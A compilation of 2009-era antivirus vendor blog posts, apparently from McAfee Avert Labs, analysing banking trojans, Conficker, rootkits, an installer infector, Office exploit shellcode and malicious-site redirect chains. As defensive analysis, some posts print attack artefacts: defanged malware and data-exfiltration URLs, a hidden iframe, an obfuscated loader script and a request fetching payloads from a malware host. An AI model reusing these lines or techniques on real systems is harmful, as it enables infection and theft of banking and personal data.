Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

Today I came across a program that claims to be an installer for the VLC media player. Innocent, right? Guess again. For starters, the installation file was different from that supplied by the legitimate VLC media player site.

At Step 3 of the installation I saw this dialog box:

The translation of the message from French is, “HELP US IMPROVE OUR SERVICE. To obtain your activation code call [number removed]. To receive your code in SMS send the keyword CODE to [number removed].” This is a case of SMS fraud!

As usual, we shouldn’t install programs from sources that we don’t trust. In our case, we know from Step 3 of the installation that we’re dealing fraudsters. So why continue with the installation?

We detect this Trojan as Ransom-E, updated in the 5597 DATs.

New variants of the StealthMBR trojan aka Mebroot rootkit have recently been spotted in-the-wild. These new variants are significantly different from earlier ones.

StealthMBR has arguably been dubbed as the stealthiest rootkit ever seen. The new variants are using even ‘deeper’ techniques to evade detection. Broadly speaking, they are hijacking kernel objects (device object) to filter out access to the master boot record and prevent detection and repair. As opposed to earlier variants, which installed lower level hooks on the IRP table of \driver\disk, these new variants are able to hook the IRP table of an even lower driver. And these hooks too are not present all the time but only installed on an on-demand basis. The hijacked disk device object is used to facilitate this. Detection is not the only problem; this threat also poses cleaning challenges by installing watching mechanisms to re-infect the machine. The following image show what an infected MBR looks like. Booting off of an external medium and inspecting should reveal the infected MBR.

The following image shows hijacked kernel object for disk device.

Once installed this threat does not require any file or registry entry to sustain itself on the compromised machine. But for installation to occur there is a dropper executable which has also changed as compared to older variants. The detection for new droppers is added as StealthMBR.a. The good thing is, we already had proactive detection for some dropped files as PWS-JA.gen.a. This should help identify problems and prevent users from getting infected in the first place. We have also developed a solution for detecting and removing this threat once a machine is compromised. It is currently under QA and will be delivered through regular DAT updates very shortly.

While we are on this subject, we also wanted to plug an upcoming webcast. We will be discussing the workings of StealthMBR rootkit and how we deliver solutions for complex threats like these through regular DAT updates without the need for special stand-alone tools. This webcast will also cover the current rootkit trends & techniques. Come and learn about how to prevent rootkit incidents in your environment and how to tackle such incidents if unfortunately they do occur. See you there!

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we had discussed in our previous blog, it is spread through pirated software at this point (a huge No, No anyway) so hopefully distribution will be light and not result in a large numbers. It definitely does highlight the need for security software regardless of platform!

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again – starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen – or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch – so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as – Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. – Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

Do you remember what the first goal of file infector distribution is? It is demand. Without demand, infected files may never be downloaded by end users. What is the second goal? To stay undetected by most AV products. A week ago we found a new file infector that fits the bill.

Nowadays, instead of relying on mass mailing, malware authors are specifically attacking individual companies producing popular software. We’ve been contacted by several software development companies with a similar issue – suspected malware on their machines. Somebody noticed that hashes calculated for setup installers and packages distributed to million of customers were different from what they should have originally been.

Brief reference – “Setup package installer application creates executable installation wizard of windows program without changing software functionality and data file integrity. Advanced setup creator tool generates program setup self extracting file by adding company name, version, setup name, desktop icon, copyright text, start menu icon, installation folder path and license agreement. Setup generator program includes multiple application files into single executable .exe setup with full install and uninstall feature.”

Packages (executable files) were self protected using strong integrity checks, some were digitally signed. This is common for professional setup builder tools producing self extracting executables; to check integrity of the installer before uncompressing and extracting data in order to protect the product and make sure it is not damaged or modified. Checksums and similar protection features are implemented in every popular self extracting archives (WinRar, WinZip), installers (NSIS, Astrum, InstallShield), and software protection systems (ASProtect, Themida or Armadillo). If anything happens to the installer, e.g. any single byte is modified – the end user will be notified with an error message. But in this particular case none of the users reported any problems while running packages / installers, no warnings were raised by any AV products either.

We’ve received about 5 different samples. All executables were created with either commercial or open source setup builders, were packed, and contained overlay (extra data at the end of the file) where installers typically keep compressed and/or encrypted data. Upon execution, samples did not perform any visible and unexpected activity, extracted files were clean (majority of executables were digitally signed and had a valid signature). Since the files inside the installers are not modified, the only way malware can be distributed is by modifying the installers themselves, so Avert Labs Research Team was notified to take a closer look on suspicious files.

Within about 30 minutes, a new generic signature “W32/Winemmem” was added to the database to detect a new file infector and clean the virus body in order to remove the detected virus from the file, so that the file can be used safely.

Let’s go ahead and follow the virus logic to understand what it does and see how it was possible to infect installers and bypass self integrity checking. W32/Winemmem infects packages, installers, and self-extracting archives (files with extra data, so called “overlay”). It rewrites the code section of the original application (1) and relocates a random size block of code from the beginning of code section and OEP (2) to the end of the file (3 and 4 below accordingly), increasing the size of extra data. This Virus does not create new sections; it does not modify the PE header. In order to gain control when an infected file is run the Virus rewrites the original code located at entry point:

Once an infected executable is executed, the virus hooks the CreateFileA() API. W32/Winemmem gains control and searches for Windows PE executables in the Program Files folder. It then parses the Import Table and searches for system dynamic link libraries (DLL) associated with executables (EXE). Next, the virus copies the found DLL to the same folder that contains the found EXE file and infects the copied DLL by modifying code at the Entry-Point and appending the virus body to the end of last section, so that malicious code is executed every time any of the infected EXE files are run. Upon execution of any “infected” files in Program Files folder, virus hooks the WS2_32.dll Send() API and performs malicious activity the first time an infected application calls it. It may infect files on removable drives by searching the entire drive for suitable executables, or download and execute files from remote hosts.

So, since the original setup installer is modified, code section and file sizes are changed; why doesn’t the application perform self integrity checking; why aren’t users warned? Once an infected file is executed, the virus restores the original application on disk by rewriting data from the beginning of code section and OEP back to file. In order to prevent the classic interceding update scenario, Windows locks the file and it is not possible to write to it. In order to bypass that, the virus drops a kernel-mode rootkit (MD5: CE769EAE2F1A7A4ED622C15E715D851E) and hooks a kernel-mode API located in ntoskrnl.exe (the function name is concealed for a security reasons). According to our research, this routine is called by the file system before deleting or opening any file for write access. All the rootkit needs to do is to hook the API and check for input parameters. That’s exactly what it does – patches the first 8 bytes to return 1 in all the cases, by rewriting the beginning of the API with two instructions:

8 bytes and you can delete any file on disk no matter whether it is running executable, loaded dynamic link library, or any other file locked by some process. While testing it, I managed to delete entire Windows folder without any errors or questions from secure operating system.

But what is the purpose of hooking the ExitProcess() and ExitWindowsEx() API’s? Since the original file on disk does not contain the virus body anymore (remember, the virus is in memory and the file on disk was fixed in order to bypass integrity checks), W32/Winemmem needs to infect the file again once user tries to close the installer (ExitProcess) or reboot the system (ExitWindowsEx).

Ok, what about second goal I mentioned in the beginning – is it invisible for AV products? Even though it is not polymorphic, a majority of AV vendors, except for a few (not listed here that catch dropped rootkit) do not currently detect the Virus (as of 07/04, as seen in these VirusTotal results):

Btw, this variant of W32/Winemmem keeps all the information necessary to restore original file at the constant offset unencrypted. If you are writing cleaning for this one, check the table located at OEP + 0×159. It contains VA’s and sizes for the stolen bytes.

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY  since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

“Artemis” is a McAfee’s new cloud-computing technology that is capable of detecting new malware threats in real time. In the last 48 hours our Artemis Technology detected some malware that it was targeted to certain regions of the world.

In North America, one particular sample was queried by Artemis more than 80 times by more than 60 unique (ISP, not end-point) IP address. This is highlighted in the first figure below by the dispersed nature of the red dots. Artemis has already detected this malware and offers extra protection over the regular DAT files. After further analysis we added detection for this sample in the regular DATs as “Generic.dx” Trojan for Thursday’s DAT release.

This particular sample was seen only in North America. The red dot in the Pacific Ocean covers the islands of Hawaii, while the dot in Europe is from a well-known multi-AV scanner service vendor based in Spain. Presumably the sample was submitted there by someone in America!

Sorry to pick on North America again, but another sample has popped up on our radar. As you can see, we didn’t have automatic protection for this but the various systems analyzing the threat details soon marked this as bad. These systems report that this sample has been seen only through our consumer (VirusScan Online) and SMB (ToPS) products. This sample has now been classified as a Spy-Agent.bw Trojan and will also be included in Thursday’s regular DATs.

Example 1:

Example 2:

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint Zero-Day exploits that once again are used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, yet unpatched hole in Microsoft PowerPoint and causes it to execute code infiltrated by the attackers. This blog post shows how the shellcode works and what it does, right after an innocent victim opens the malicious file – if the attacker gets their way of course!

For size reasons, the code is split up into several parts that are scattered among the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to relocate the remaining part of the shellcode in memory. In order to do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transfered to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0×30000000). Another loop then XOR decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (”fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are going to be imported by parsing OS internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode mostly needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32bit hashes of API functions to import, rather than a list of respective function names which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over any exported API function name and compares it against its given list at run-time. Applying the same technique when statically analyzing shellcode, the list of imported functions becomes readable. Looking at the now readable list, it does not contain any function which would indicate the shellcode to download a file but rather drop an embedded one from the PowerPoint file and execute it.

Using a hex-search for typical indicators of an executable file, such as an “MZ” or “PE” header doesn’t yield any feasible results – which is not astonishing at all. Of course, the attackers responsible for having built the exploit intended to prevent their cover being blown by something as obvious as an executable that is embedded into a PowerPoint presentation file! By looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8bit XOR key. By incorporating the same decryption-loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ- and PE header surface in the hex editor. It’s the embedded executable that was assumed to hide between the PowerPoint “slides” – the malware can finally be extracted.

McAfee VirusScan products detect this threat as Exploit-PPT.k trojan, McAfee Anti-Malware Gateway Edition (former Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe.  It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan.  It then follows to establish an outbound connection with a remote IRC server using following credentials:

• PASS h4xg4ng
• NICK [00-USA-XP-9215671]
• USER SP2-ojd, followed by the name of the infected computer.

This worm exploits the MS08-067 vulnerability indeed, and uses a download-and-execute shellcode which behaves in an identical fashion as Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems into new targets. Unlike Conficker which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself.  The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is not only used by whitehatsfor vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is not an exception, it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as dcerpc service connection testing code located in the “client.rb” module. By using these routines,  new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The way how W32/IRCbot.gen.a ordered the attack packets is identical to Metasploit’s MS08-067 module  (ms08_067_netapi.rb):

Both Conficker and W32/IRCbot.gen.a uses open source tools similarly to their advantage to make their work much easier.

We went on to investigate additional sites where the worm is connecting to and the payload that it is trying to download. Packet sniffer logs shows that it accesses at least two other remote servers:

• hxxp://98.1[infected].42:443/n
• hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

Well, hello Donbot ! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C) detected generically as Generic.dx appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet . While other botnets – namely Cutwail and Rustock continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious – and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked – even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detects this threat as Exploit-PPT.k trojan using the 5573 DATs to be released on the same day. 

As with most other document exploits, these PowerPoint files install malicious trojans in the background but displays an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

• fssm32.exe: 428,032 bytes (Muster.c trojan)
• IEUpd.exe : 45,056 bytes (Muster.c trojan)
• setup.exe : 13, 1072 bytes (Muster.c trojan)
• PeerCM.exe : 80,666 bytes (Generic BackDoor.u trojan)
• ws2_42.dll :10,6740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Showfiles with the “.pps” extension. Such files typically opens in full screen mode and hides the  applications running on the desktop such as system monitoring tools that could give any clue to the dodgy installation of trojans to the victim.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

A lot has already been written about Conficker. There had been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of the Conficker.C behavior. 

We setup a small testbed that had a machine infected with Conficker.C in a controlled environment; and another Linux box that was customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: Pre- April 1st and the April 1st phase.

During the Pre- April 1st phase we observed the following.

Conficker.C gets the current time from some of the popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website which is followed by a HTTP GET request to that IP address. The below figure illustrates an attempt made to craigslist.org:

Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive and simultaneous UDP & TCP scans. The volume of the UDP scans was particularly high – roughly 2-3 UDP queries per second and seems to taper down as we got closer to April 1st. As most of the randomly generated IP addresses were not live or did not have the targeted ports opened, there were a large number of ICMP messages received – port unreachable , host unreachable, time-to-live exceeded.

“April Fooling Conficker.C”

In the April 1st phase, we intercepted and manipulated the HTTP date check query responses, so that for every website that Conficker.C queries, it gets a response with a date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only 2 date check sources, we managed to fool the malware into thinking it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.

There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer discovery packets, and found some patterns in both the requests and responses. These patterns are valid for both the pre- April 1st and April 1st UDP scans. Based on this, we have incorporated a new heuristics into our latest Network Security Platform Signature set 5.1.16.15, or 4.1.46.16.

McAfee Network Security Platform (Intrushield) customers can observe the following alerts.

• WORM: W32/Conficker.C Activity Detected
• HTTP: Suspicious Time Check Detected

The figure below illustrates the alert viewer drilled down by a Source IP that has generated the “WORM: W32/Conficker.C Activity Detected ” alert.

 (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

•  “More Comments Regarding Conficker“
•  “W32/Conficker: Much Ado About Nothing?“.

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We often see messages from malware authors in the malware that we analyze. And, strangely, unlike the theme of The Police’s hit song “Message in a Bottle,” these are never expressions of love. On the contrary, they’re usually offensive.

Backdoor-DOQ is a backdoor Trojan. A variant that we analyzed last week would, among other things, establish a connection to a remote server via IRC and wait for commands from an attacker on the communication channel. Beyond its nastiness, the Backdoor-DOQ executable contains a message in plain text. I’ve censored the nonfamily friendly pieces of this: “I do voodoo on your mom [expletive]. BTW metal rules pop sucks.”

It’s hardly a love song.

Everyday there are thousands of websites that have been injected with malicious code and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and its features are easy-to-use, as well as free. Multiple buffer overflow in Baofeng2 Storm allow for the downloading and execution of files. CVE Number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. CVE Number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great deal of customers. Buffer overflows in Xunlei Web before version 5.6.3.44 can execute arbitrary code with the vulnerability. CVE Number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software base on p2p streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a kind of free game. It is a gaming platform that covers all the related fields and areas of network games. It has a category of nearly one hundred species of games, including Card games, leisure games, large-scale network and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module in the ConnectAndEnterRoom() method allows for the execution arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool. It’s similar to a PDF reader. Buffer overflows in the Ultra Star Reader allows for execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allows for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as http, ftp and bit torrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

There is really no scarcity of spurious security programs. Almost daily, we see programs that pretend to be security programs but in reality are malicious. They display messages about system compromise and attempt to frighten users into purchasing some other malicious program to prevent the compromise. Or worse. While displaying fake messages about system compromise is bad, it’s almost benign when you consider that a rogue antispyware could itself be spyware.

Last week we stumbled upon FakeAlert-AntiSpywarePro. This is a rogue antispyware program. If you’re unlucky enough to run this application, you’ll see a window such as this:

You can run several kinds of system scans with this program. But to what avail? You can’t trust a program that lies to you. FakeAlert-AntiSpywarePro drops a number of files and installs a bunch of registry keys, including a key for a browser-helper object (BHO) for Internet Explorer.

So keep your AV signatures up to date, and say no to FUD seeded by unscrupulous malware authors!

Don’t you like when legit obfuscated javascript is mixed with the malicious one?
Also, don’t you like when the malicious one is linked with several redirection, referrals, exploits and other malwares?

So, here is the story…
Once upon a time a user was checking for a service on google and found one that fits the need…
The site is a innocent (until proved otherwise) website that exists for some years to announce a specific type of service.
The site uses all those fancy (and legit) javascript to give some special effects to the website.

Indeed, real special effects…because when you get in there, all the magic happens…:)

From the user standpoint, he just went to the website, lets call it specialeffectsservices.domain, and suddenly his machine is owned, and the AV starts to pop up with alerts…

A more closer view reveals what happened:
Among all .js file on the website, there is one that besides the regular fancy javascript, there was one not so innocent…

The script was obfuscated with the known (p,a,c,k,e,d) function.

I managed to deobfuscated and found the following iframe:
[iframe width=1 height=1 src='hXXp://[REMOVED]-atm.net/b2b/’style=’display:none’ > ></iframe]

If you go to [REMOVED]-atm.net website, you will find the nice message:

H@K3D 8Y J@KE-M1L

If you go to [REMOVED]-atm.net/b2b you will be redirected to files[REMOVED].net

The files[REMOVED].net also contains a folder called b2b with another obfuscated script (which you are only able to see with the right referral):

[SCRIPT LANGUAGE="JavaScript"]
function spl(){var
crypted=”60!83!99!114!105!112!116!32!76!97!110!103!117!97!103
!101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!
41!59!32
.
.
.
3!125!125!32!13!10!60!47!83!99!114!105!112!116!62!”;var
i,out=”",temp=”",c=0;l=crypted.length;do{while(crypted.charAt(c)!=’!')temp=temp+crypted.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp=”";}while(c<=crypted.length-1);document.write(out);}
spl();
[/SCRIPT]

When I finally were able to deobfuscate it, it was possible to see that it was leading to even another redir, in the same site,as you can see:

q.open(’GET’,'hXXp:// files[REMOVED].net/b2b/load/’,0);

The /load folder will push a PE file to user’s machine, on c:\ usually with a name T.exe .

Of course it does not stop there…:)

The T file is a downloaders, which will then download 2 additional files from the same domain plus another one from hansali[REMOVED].com

As an additional information, files[REMOVED] is the C&C from the malware installed.

And yes, we detect them all…:)

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

